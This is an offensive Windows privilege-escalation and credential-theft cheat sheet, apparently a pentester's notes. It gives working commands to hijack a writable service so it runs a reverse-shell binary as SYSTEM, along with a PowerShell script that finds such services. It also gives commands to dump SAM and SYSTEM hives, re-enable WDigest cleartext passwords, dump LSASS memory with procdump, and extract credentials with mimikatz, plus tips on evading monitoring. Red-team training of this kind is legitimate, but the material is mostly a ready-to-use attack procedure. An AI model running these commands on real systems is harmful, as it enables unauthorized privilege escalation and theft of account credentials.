
Privilege Escalation

LOLBAS

Privilege Escalation

  • WinPEAS
  • LinPEAS
  • Windows Exploit Suggester
  • Hot Potato, Juicy Potato, Lonely Potato, Sweet Potato (token impersonation via SeImpersonatePrivilege)
  • BloodHound

Credential Harvesting

  • Responder
  • Inveigh
  • Mimikatz
  • ntdsutil
  • secretsdump
  • Impacket

Service Exploits

Insecure Service Permissions

  1. Find a writable service.

    • accesschk.exe

      # accesschk.exe
      #   [
      #       [-d]        (only process directories or top level key)
      #       -k          (name is a Registry key)
      #       -p [-f]     (name is a process name or PID)
      #                   (show full process token information)
      #       -c          (name is a Windows Service)
      #       -o [-t <object type>]
      #                   (name is an object in the Object Manager namespace)
      #   ]
      #   [-r]        (show read access only)
      #   [-w]        (show write access only)
      #   [-q]        (omit the banner)
      #   [-u]        (suppress errors)
      #   [-v]        (verbose)
      #   [<username>]
      #   { <file (default)> | <directory> | <registry key> | <process> | <service> | <object> }
      
      accesschk.exe /accepteula -uwcqv user *
      
      "*" enumerates every service; the rights that matter are SERVICE_CHANGE_CONFIG (or SERVICE_ALL_ACCESS), and WRITE_DAC / WRITE_OWNER, which let you grant yourself the rest. Check which account the service runs as (sc qc <service>) before touching it: only a service running as LocalSystem (or another privileged account) is worth the noise.

  2. Overwrite the service config.

    • sc

      sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
      
      The space after "binpath=" is required by sc. Note the original binpath first (sc qc) so it can be restored afterwards.

  3. Start the service.

    • sc

      sc start daclsvc
      
    • net

      net start daclsvc
      
    Starting needs SERVICE_START on the service; without it the new binary only runs when the service starts on its own (auto-start plus a reboot). The payload runs as the service account and must behave like a service, otherwise the SCM kills it after about 30 seconds, so spawn the real payload and exit, or use a proper service binary.

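The following is an added example, not code from the original notes: a PowerShell sweep that does the accesschk step natively by parsing each service's SDDL from `sc sdshow`, checking the allow ACEs against every SID in the current token, and reporting which of the abusable rights (change config, start, write DACL/owner) you actually hold, together with the account the service runs as. It assumes `sc.exe` is on the PATH and that the caller can read service security descriptors, which Authenticated Users can by default; the access-mask constants are the documented values from winsvc.h / winnt.h.

```powershell
# Added example (not from the original page). Find services whose DACL grants the
# current user, or one of its groups, rights that enable the sc config / sc start abuse.
# Assumption: sc.exe on PATH; sc sdshow readable for the service (default for users).

# Service-specific rights (winsvc.h) and the standard/generic rights that imply them (winnt.h)
$SERVICE_CHANGE_CONFIG = 0x00000002   # change binpath=  (the core of the attack)
$SERVICE_START         = 0x00000010   # run the new binary without waiting for a reboot
$WRITE_DAC             = 0x00040000   # rewrite the DACL and grant yourself everything
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000   # for services GENERIC_WRITE maps to SERVICE_CHANGE_CONFIG

$interesting = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# SIDs that apply to us: the user SID plus every group SID in the current token
$id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

function Get-AbusableService {
    foreach ($svc in Get-Service) {
        # sc sdshow prints an empty line followed by the SDDL string ("D:(A;;...)S:(AU;...)")
        $sddl = (& sc.exe sdshow $svc.Name 2>$null) | Where-Object { $_ -match '^D:' } | Select-Object -First 1
        if (-not $sddl) { continue }   # access denied or nothing returned

        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor ($sddl.Trim())
        $allowed = 0
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
            # Only allow ACEs for principals in our token are summed; deny ACEs are ignored,
            # so treat a hit as "confirm with accesschk", not as proof.
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if ($mySids -contains $ace.SecurityIdentifier.Value) {
                $allowed = $allowed -bor $ace.AccessMask
            }
        }
        if (($allowed -band $interesting) -eq 0) { continue }

        # The service account decides what the abuse yields (LocalSystem == SYSTEM shell)
        $wmi = Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'"
        [pscustomobject]@{
            Service      = $svc.Name
            RunsAs       = $wmi.StartName
            BinPath      = $wmi.PathName
            ChangeConfig = ($allowed -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL)) -ne 0
            CanStart     = ($allowed -band ($SERVICE_START -bor $GENERIC_ALL)) -ne 0
            WriteDacl    = ($allowed -band ($WRITE_DAC -bor $WRITE_OWNER)) -ne 0
        }
    }
}

Get-AbusableService | Format-Table -AutoSize
```

A row with ChangeConfig and CanStart both true and RunsAs of LocalSystem is the case the procedure above exploits directly; WriteDacl alone means you first have to rewrite the DACL (for example with `sc sdset`) to give yourself those two rights.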

Potato Attacks

PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | itm4n

Pass the Hash

Hash Source

SAM (registry)

Local accounts only (domain accounts are never stored in the SAM). Both export methods need an elevated prompt. The SYSTEM hive holds the boot key used to encrypt the SAM hashes, so always take both hives.

  • Export

    • reg

      cmd> reg save HKLM\SAM .\sam.hive
      cmd> reg save HKLM\SYSTEM .\system.hive
      
      reg save writes a binary hive regardless of the extension; it is not a .reg text export.

    • vssadmin

      cmd> vssadmin create shadow /for=C:
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .\sam.hive
      cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .\system.hive
      
      The /for= volume is mandatory. Use the "Shadow Copy Volume Name" that vssadmin prints instead of assuming ShadowCopy1, which is only correct when no other shadow copy already exists on the host.

  • Show

    sh> samdump2 system.hive sam.hive
    

LSASS (memory)

Only accounts that currently have a logon session on the host (interactive, RDP, service, scheduled task). Their NTLM hashes and Kerberos tickets are cached in LSASS regardless of the step below.

  • Prerequisite (optional, only for cleartext passwords)

    cmd> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
    
    Windows 8.1 / Server 2012 R2 and later no longer keep WDigest cleartext passwords in LSASS. Setting this value re-enables that, but only for logons that happen after the change, so you still need a new logon or a reboot. Requires admin and the key is widely monitored.

  • Export

    cmd> procdump.exe -accepteula -ma lsass.exe lsass.dmp
    
    Fails with access denied when LSASS runs as a protected process (RunAsPPL); with Credential Guard the dump is readable but contains no usable secrets.
    
  • Show

    • From dump file

      mimikatz> sekurlsa::minidump lsass.dmp
      mimikatz> sekurlsa::logonPasswords
      
    • Live

      mimikatz> privilege::debug
      mimikatz> sekurlsa::logonpasswords
      

DCSync

Pass the Ticket

ADCS (ESC1-16)